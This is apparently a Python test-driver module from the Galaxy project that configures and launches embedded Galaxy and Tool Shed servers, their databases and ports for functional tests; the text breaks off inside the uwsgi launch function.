import threading
import time
from typing import Optional
from urllib.parse import urlparse
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.app_unittest_utils.celery_helper import rebind_container_to_task
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.database_utils import create_database, database_exists
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.webapps.galaxy import buildapp
from galaxy_test.base.api_util import get_admin_api_key, get_user_api_key
from galaxy_test.base.env import (
DEFAULT_WEB_HOST,
target_url_parts,
)
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
# Absolute path of the Galaxy checkout; all test asset paths hang off of it.
galaxy_root = galaxy_directory()
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
# Comma-separated: a checkout-local directory first, a git URL as fallback source.
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
# The shed tool conf location can be overridden per test run via the environment.
INSTALLED_TOOL_PANEL_CONFIGS = [
    os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
# if interactive tool path, jump to interactive tool, else skip to
# endendend (default uwsgi params).
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
# Prefer the uvicorn/ASGI server unless explicitly disabled via the environment.
USE_UVICORN = asbool(os.environ.get('GALAXY_TEST_USE_UVICORN', True))

# Module-level logger shared by all driver helpers (see build_logger()).
log = logging.getLogger("test_driver")

# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
    """Ensure TOOL_SHED_TEST_TMP_DIR points at a usable scratch directory and return it.

    Temporary directories for the hgweb.config file, the database, new
    repositories, etc. are created inside this directory.  Because the tool
    shed browses repository contents via HTTP, the resolved path must not
    contain characters that are invalid in URLs - hence realpath() on the
    freshly created temp dir.
    """
    tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR')
    if tmp_dir is None:
        tmp_dir = os.path.realpath(tempfile.mkdtemp())
    os.environ['TOOL_SHED_TEST_TMP_DIR'] = tmp_dir
    return tmp_dir
def get_galaxy_test_tmp_dir():
    """Create test directory for use by Galaxy server being setup for testing.

    An explicitly configured GALAXY_TEST_TMP_DIR wins; otherwise a fresh
    temporary directory is created (but NOT exported back to the environment).
    """
    configured = os.environ.get('GALAXY_TEST_TMP_DIR')
    return tempfile.mkdtemp() if configured is None else configured
def configure_environment():
    """Hack up environment for test cases (idempotent; existing values win)."""
    env = os.environ
    # no op remove if unused
    if 'HTTP_ACCEPT_LANGUAGE' not in env:
        env['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
    # Used by get_filename in tool shed's twilltestcase.
    if "TOOL_SHED_TEST_FILE_DIR" not in env:
        env["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
    # Marker consumed elsewhere to detect that this setup already ran.
    env["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
    """Build a logger for test driver script."""
    # Currently just hands back the shared module-level "test_driver" logger.
    return log
def ensure_test_file_dir_set():
    """Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.

    Return first directory for backward compat.
    """
    # The value is a comma-separated list of locations; export it so child
    # processes resolve test data the same way.
    file_dirs = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
    os.environ['GALAXY_TEST_FILE_DIR'] = file_dirs
    first_dir, _, _ = file_dirs.partition(",")
    return first_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
allow_tool_conf_override: bool = True,
allow_path_paste=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
user_library_import_dir: Optional[str]
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = 'test/functional/tools/sample_data_manager_conf.xml'
if default_data_manager_config is not None:
data_manager_config_file = f"{default_data_manager_config},{data_manager_config_file}"
master_api_key = get_admin_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ
or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
if allow_tool_conf_override:
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
else:
tool_conf = default_tool_conf
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = f"{tool_conf},{shed_tool_conf}"
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_path_paste=allow_path_paste,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = f"sqlalchemy+sqlite:///{os.path.join(tmpdir, 'control.sqlite')}?isolation_level=IMMEDIATE"
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = f'{default_tool_data_config},{test_tool_data_config}'
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
    """Setup a nose context and run tests.

    Tests are specified by argv (defaulting to sys.argv).

    :param argv: command line arguments handed to nose (defaults to ``sys.argv``).
    :param env: environment mapping handed to nose (defaults to ``os.environ``).
    :param ignore_files: file patterns nose should skip.
    :param plugins: nose plugin manager (defaults to nose's default manager).
    :returns: True when the test run succeeded.
    """
    if env is None:
        env = os.environ
    if ignore_files is None:
        ignore_files = []
    if plugins is None:
        plugins = nose.plugins.manager.DefaultPluginManager()
    if argv is None:
        argv = sys.argv
    test_config = nose.config.Config(
        # Bug fix: ``os.environ`` used to be passed here unconditionally,
        # silently ignoring a caller-supplied ``env``.
        env=env,
        ignoreFiles=ignore_files,
        plugins=plugins,
    )
    # Add custom plugin to produce JSON data used by planemo.
    test_config.plugins.addPlugin(StructuredTestDataPlugin())
    test_config.configure(argv)
    result = run(test_config)
    success = result.wasSuccessful()
    return success
def copy_database_template(source, db_path):
    """Copy a 'clean' sqlite template database.

    From file or URL to specified path for sqlite database.
    """
    parent_dir = os.path.dirname(db_path)
    if not os.path.exists(parent_dir):
        os.makedirs(parent_dir)
    if os.path.exists(source):
        shutil.copy(source, db_path)
        assert os.path.exists(db_path)
        return
    if source.lower().startswith(("http://", "https://", "ftp://")):
        try:
            download_to_file(source, db_path)
        except Exception as e:
            # We log the exception but don't fail startup, since we can
            # do all migration steps instead of downloading a template.
            log.exception(e)
        return
    raise Exception(f"Failed to copy database template from source {source}")
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
    """Find (and populate if needed) Galaxy database connection.

    Resolution order: an explicit <prefix>_TEST_DBURI (optionally cloned from
    a template database when postgres), otherwise a sqlite database under
    *db_path* (optionally seeded from <prefix>_TEST_DB_TEMPLATE).
    """
    database_auto_migrate = False
    check_migrate_databases = True
    dburi_var = f"{prefix}_TEST_DBURI"
    template_name = None
    if dburi_var in os.environ:
        database_connection = os.environ[dburi_var]
        # only template if postgres - not mysql or sqlite
        do_template = prefer_template_database and database_connection.startswith("p")
        if do_template:
            # Clone the configured database URI into a uniquely named test
            # database so the template itself is never modified.
            database_template_parsed = urlparse(database_connection)
            template_name = database_template_parsed.path[1:]  # drop / from /galaxy
            actual_db = f"gxtest{''.join(random.choice(string.ascii_uppercase) for _ in range(10))}"
            actual_database_parsed = database_template_parsed._replace(path=f"/{actual_db}")
            database_connection = actual_database_parsed.geturl()
            if not database_exists(database_connection):
                # We pass by migrations and instantiate the current table
                create_database(database_connection)
                mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
                toolshed_mapping.init(database_connection, create_tables=True)
                check_migrate_databases = False
    else:
        default_db_filename = f"{prefix.lower()}.sqlite"
        template_var = f"{prefix}_TEST_DB_TEMPLATE"
        db_path = os.path.join(db_path, default_db_filename)
        if template_var in os.environ:
            # Middle ground between recreating a completely new
            # database and pointing at existing database with
            # GALAXY_TEST_DBURI. The former requires a lot of setup
            # time, the latter results in test failures in certain
            # cases (namely tool shed tests expecting clean database).
            copy_database_template(os.environ[template_var], db_path)
            database_auto_migrate = True
        database_connection = f'sqlite:///{db_path}'
    config = {
        "check_migrate_databases": check_migrate_databases,
        "database_connection": database_connection,
        "database_auto_migrate": database_auto_migrate
    }
    if not database_connection.startswith("sqlite://"):
        # Larger pool settings for real database servers.
        config["database_engine_option_max_overflow"] = "20"
        config["database_engine_option_pool_size"] = "10"
    if template_name:
        config["database_template"] = template_name
    return config
def install_database_conf(db_path, default_merged=False):
    """Build config options for the tool shed install database.

    Resolution order: GALAXY_TEST_INSTALL_DBURI, then a merged database (no
    separate connection) when GALAXY_TEST_INSTALL_DB_MERGED/default_merged is
    truthy, otherwise a dedicated sqlite database under *db_path*.
    """
    connection: Optional[str]
    env_dburi = os.environ.get('GALAXY_TEST_INSTALL_DBURI')
    if env_dburi is not None:
        connection = env_dburi
    elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
        connection = None
    else:
        connection = f"sqlite:///{os.path.join(db_path, 'install.sqlite')}"
    if connection is None:
        return {}
    return {"install_database_connection": connection}
def database_files_path(test_tmpdir, prefix="GALAXY"):
    """Create a mock database/ directory like in GALAXY_ROOT.

    Use prefix to default this if TOOL_SHED_TEST_DBPATH or
    GALAXY_TEST_DBPATH is set in the environment.
    """
    env_key = f"{prefix}_TEST_DBPATH"
    try:
        return os.environ[env_key]
    except KeyError:
        # No explicit path configured - allocate a fresh one under the
        # test's temporary directory.
        return os.path.join(tempfile.mkdtemp(dir=test_tmpdir), 'database')
def _get_static_settings():
    """Configuration required for Galaxy static middleware.

    Returns dictionary of the settings necessary for a galaxy App
    to be wrapped in the static middleware.

    This mainly consists of the filesystem locations of url-mapped
    static resources.
    """
    static_dir = os.path.join(galaxy_root, "static")

    def _static(*parts):
        return os.path.join(static_dir, *parts)

    # TODO: these should be copied from config/galaxy.ini
    return {
        'static_enabled': True,
        'static_cache_time': 360,
        'static_dir': static_dir,
        'static_images_dir': _static('images', ''),
        'static_favicon_dir': _static('favicon.ico'),
        'static_scripts_dir': _static('scripts', ''),
        'static_style_dir': _static('style'),
        'static_robots_txt': _static('robots.txt'),
    }
def get_webapp_global_conf():
    """Get the global_conf dictionary sent to ``app_factory``."""
    # Nothing here for now except the static middleware settings.
    return dict(_get_static_settings())
def wait_for_http_server(host, port, prefix=None, sleep_amount=0.1, sleep_tries=150):
    """Wait for an HTTP server to boot up.

    Polls ``http://host:port<prefix>`` up to *sleep_tries* times, sleeping
    *sleep_amount* seconds between attempts, until a '200 OK' is observed.

    :raises Exception: when the server never returned '200 OK'.
    """
    prefix = prefix or '/'
    if not prefix.endswith('/'):
        prefix = f"{prefix}/"
    for _ in range(sleep_tries):
        # directly test the app, not the proxy
        conn = http.client.HTTPConnection(host, port)
        try:
            conn.request("GET", prefix)
            if conn.getresponse().status == 200:
                break
        except OSError as e:
            # 61/111 are ECONNREFUSED on macOS/Linux - the server just isn't
            # listening yet; anything else is a real failure.
            if e.errno not in [61, 111]:
                raise
        finally:
            # Bug fix: the probe connection used to be left open every
            # iteration.
            conn.close()
        time.sleep(sleep_amount)
    else:
        # Bug fix: the old message always claimed "10 tries" regardless of
        # the configured sleep_tries.
        template = "Test HTTP server on host %s and port %s did not return '200 OK' after %d tries"
        message = template % (host, port, sleep_tries)
        raise Exception(message)
def attempt_port(port):
    """Check whether *port* can be bound on all interfaces.

    :returns: the port number when it could be bound, otherwise None.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(('', port))
        return port
    except OSError:
        # Port is already bound by some other process.
        return None
    finally:
        # Bug fix: the probe socket used to leak when bind() failed.
        sock.close()
def attempt_ports(port):
    """Return a usable test server port (as a string when randomly chosen).

    When *port* is supplied it is returned as-is; otherwise up to 9 random
    ports in [8000, 10000] are probed and the first free one is returned
    (and exported as GALAXY_WEB_PORT).

    :raises Exception: when no free random port could be found.
    """
    if port is not None:
        # Bug fix: an unreachable ``raise`` statement used to follow this
        # return; an explicitly configured port is trusted as-is.
        return port
    random.seed()
    for _ in range(0, 9):
        port = attempt_port(random.randint(8000, 10000))
        if port:
            port = str(port)
            os.environ['GALAXY_WEB_PORT'] = port
            return port
    raise Exception(f"Unable to open a port between {8000} and {10000} to start Galaxy server")
def serve_webapp(webapp, port=None, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the port the webapp is running on.
    """
    port = attempt_ports(port)
    server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
    threading.Thread(target=server.serve_forever).start()
    return server, port
def uvicorn_serve(app, port, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the port the webapp is running on.
    """
    import asyncio

    from uvicorn.config import Config
    from uvicorn.server import Server

    access_log = 'GALAXY_TEST_DISABLE_ACCESS_LOG' not in os.environ
    server = Server(config=Config(app, host=host, port=int(port), access_log=access_log))
    loop = asyncio.new_event_loop()

    def _drive_server():
        # Run the uvicorn server to completion on a dedicated event loop.
        try:
            asyncio.set_event_loop(loop)
            loop.run_until_complete(server.serve())
        finally:
            loop.close()
            asyncio.set_event_loop(None)
            log.info("Event loop for uvicorn closed")

    thread = threading.Thread(target=_drive_server)
    thread.start()
    return server, port, thread
def cleanup_directory(tempdir):
    """Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.

    Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
    """
    if "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ:
        log.info(f"GALAXY_TEST_NO_CLEANUP is on. Temporary files in {tempdir}")
        return
    try:
        # Bug fix (tidy-up): the old ``and not skip_cleanup`` re-check here
        # was redundant - that case already returned above.
        if os.path.exists(tempdir):
            shutil.rmtree(tempdir)
    except Exception:
        # Best-effort cleanup; never fail a test run over leftover temp files.
        pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
    """Modify Galaxy app's toolbox for migrated or installed tool tests.

    NOTE(review): ``testing_migrated_tools`` and ``tmpdir`` are not used in
    this implementation - confirm whether the migrated-tools branch was
    intentionally removed.
    """
    if testing_installed_tools:
        # TODO: Do this without modifying app - that is a pretty violation
        # of Galaxy's abstraction - we shouldn't require app at all let alone
        # be modifying it.
        tool_configs = app.config.tool_configs
        # Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
        # and reload the app's toolbox.
        relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
        if relative_migrated_tool_panel_config in tool_configs:
            tool_configs.remove(relative_migrated_tool_panel_config)
        for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
            tool_configs.append(installed_tool_panel_config)
        from galaxy import tools  # delay import because this brings in so many modules for small tests # noqa: E402
        app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs) -> GalaxyUniverseApplication:
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary and use load_app_properties so
    Galaxy override variables are respected. Also setup "global" references
    to sqlalchemy database context for Galaxy and install databases.

    :param simple_kwargs: flat config dict; must include 'database_connection'.
    :returns: the constructed GalaxyUniverseApplication.
    """
    log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
    simple_kwargs['global_conf'] = get_webapp_global_conf()
    simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
    simple_kwargs = load_app_properties(
        kwds=simple_kwargs
    )
    # Build the Universe Application
    app = GalaxyUniverseApplication(**simple_kwargs)
    if not simple_kwargs.get("enable_celery_tasks"):
        # Celery disabled - rebind the task container (presumably so tasks
        # run in-process; confirm against rebind_container_to_task).
        rebind_container_to_task(app)
    log.info("Embedded Galaxy application started")
    # Expose the sqlalchemy contexts at module scope for test helpers.
    global galaxy_context
    global install_context
    galaxy_context = app.model.context
    install_context = app.install_model.context
    # Toolbox indexing happens via the work queue out of band recently, and,
    # beyond potentially running async after tests execute doesn't execute
    # without building a uwsgi app (app.is_webapp = False for this test kit).
    # We need to ensure to build an index for the test galaxy app -- this is
    # pretty fast with the limited toolset
    app.reindex_tool_search()
    return app
def build_shed_app(simple_kwargs):
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary. Also setup "global" reference
    to sqlalchemy database context for tool shed database.

    :param simple_kwargs: flat config dict; must include 'database_connection'.
    :returns: the constructed ToolshedUniverseApplication.
    """
    log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
    # TODO: Simplify global_conf to match Galaxy above...
    simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
    simple_kwargs['global_conf'] = get_webapp_global_conf()
    app = ToolshedUniverseApplication(**simple_kwargs)
    log.info("Embedded Toolshed application started")
    # Expose the sqlalchemy context at module scope for test helpers.
    global tool_shed_context
    tool_shed_context = app.model.context
    return app
def explicitly_configured_host_and_port(prefix, config_object):
    """Determine the (host, port) a test server should use.

    Host comes from <prefix>_TEST_HOST (falling back to the config object's
    default_web_host). Port comes from <prefix>_TEST_PORT unless
    <prefix>_TEST_PORT_RANDOM marks the previous value as randomly assigned,
    in which case None is returned so a fresh random port gets picked.
    """
    default_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
    host = os.environ.get(f"{prefix}_TEST_HOST", default_host)
    if os.environ.get(f"{prefix}_TEST_PORT_RANDOM") is not None:
        # Ignore the port environment variable, it wasn't explicitly configured.
        port = None
    else:
        port = os.environ.get(f"{prefix}_TEST_PORT")
    # If an explicit port wasn't assigned for this test or test case, set this
    # environment variable so we know it is random. We can then randomly
    # re-assign for new tests.
    if port is None:
        os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
    else:
        os.environ['GALAXY_WEB_PORT'] = port
    return host, port
def set_and_wait_for_http_target(prefix, host, port, url_prefix, sleep_amount=0.1, sleep_tries=150):
    """Export <prefix>_TEST_HOST/<prefix>_TEST_PORT then block until the server responds."""
    os.environ[f"{prefix}_TEST_HOST"] = host
    os.environ[f"{prefix}_TEST_PORT"] = port
    wait_for_http_server(host, port, url_prefix, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
    """Minimal handle on a running test server: name, host, port and URL prefix.

    Subclasses supply the actual app object and shutdown behavior.
    """

    def __init__(self, name, host, port, prefix=""):
        self.name = name
        self.host = host
        self.port = port
        self.prefix = prefix

    @property
    def app(self):
        raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")

    def stop(self):
        raise NotImplementedError()
class EmbeddedServerWrapper(ServerWrapper):
    """Wrap an in-process test server (Paste or uvicorn) plus the app it serves."""

    def __init__(self, app, server, name, host, port, prefix="", thread=None):
        super().__init__(name, host, port, prefix)
        self._app = app
        self._server = server
        # Serving thread (uvicorn case); None for Paste servers.
        self._thread = thread

    @property
    def app(self):
        return self._app

    def stop(self):
        # Shutdown order matters: stop the web server first, then join the
        # serving thread, and only then shut the application down.
        log.info(f"{threading.active_count()} threads were active before stopping embedded server")
        if self._server is not None and hasattr(self._server, "server_close"):
            # Paste-style server.
            log.info(f"Shutting down embedded {self.name} Paste server")
            self._server.server_close()
            log.info(f"Embedded web server {self.name} stopped")
        if self._server is not None and hasattr(self._server, "shutdown"):
            # uvicorn-style server: flag it to exit its serve loop.
            log.info(f"Shutting down embedded {self.name} uvicorn server")
            self._server.should_exit = True
            log.info(f"Embedded web server {self.name} stopped")
        if self._thread is not None:
            log.info("Stopping embedded server thread")
            self._thread.join()
            log.info("Embedded server thread stopped")
        if self._app is not None:
            log.info(f"Stopping application {self.name}")
            self._app.shutdown()
            log.info(f"Application {self.name} stopped.")
        log.info(f"{threading.active_count()} active after stopping embedded server")
class UwsgiServerWrapper(ServerWrapper):
    """Wrap an external uwsgi subprocess running Galaxy for tests."""

    def __init__(self, p, name, host, port):
        super().__init__(name, host, port)
        # The uwsgi subprocess (subprocess.Popen-like; must support .wait()/.pid).
        self._p = p
        # Return code of the process once it has exited.
        self._r = None
        # Reap the process from a background thread so it never zombifies.
        self._t = threading.Thread(target=self.wait)
        self._t.start()

    def __del__(self):
        self._t.join()

    def wait(self):
        self._r = self._p.wait()

    def stop(self):
        try:
            # Politely ask the whole uwsgi process group to terminate first.
            os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
        except Exception:
            pass
        # Give the process a moment to exit before escalating.
        time.sleep(.1)
        try:
            # Force-kill anything in the group that is still alive.
            os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
        except Exception:
            pass
        self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch an external uwsgi process serving Galaxy for tests.

    :param kwargs: Galaxy config dict; written to a galaxy.yml in *tempdir*.
    :param tempdir: directory that receives the generated config file.
    :param prefix: env-var prefix used to resolve host/port settings.
    :param config_object: optional object consulted for extra test settings.
    :returns: a started UwsgiServerWrapper.
    :raises Exception: when the server never responds; the uwsgi process is
        stopped before the exception propagates.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    config = {}
    config["galaxy"] = kwargs.copy()
    enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
    if enable_realtime_mapping:
        # Default interactive tool settings unless already configured.
        interactive_tool_defaults = {
            "interactivetools_prefix": "interactivetool",
            "interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
            "interactivetools_enable": True
        }
        for key, value in interactive_tool_defaults.items():
            if key not in config["galaxy"]:
                config["galaxy"][key] = value
    yaml_config_path = os.path.join(tempdir, "galaxy.yml")
    with open(yaml_config_path, "w") as f:
        yaml.dump(config, f)
    if enable_realtime_mapping:
        # Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
        # though maybe it would work?
        with open(yaml_config_path) as f:
            old_contents = f.read()
        with open(yaml_config_path, "w") as f:
            test_port = str(port) if port else r"[0-9]+"
            test_host = re.escape(host) if host else "localhost"
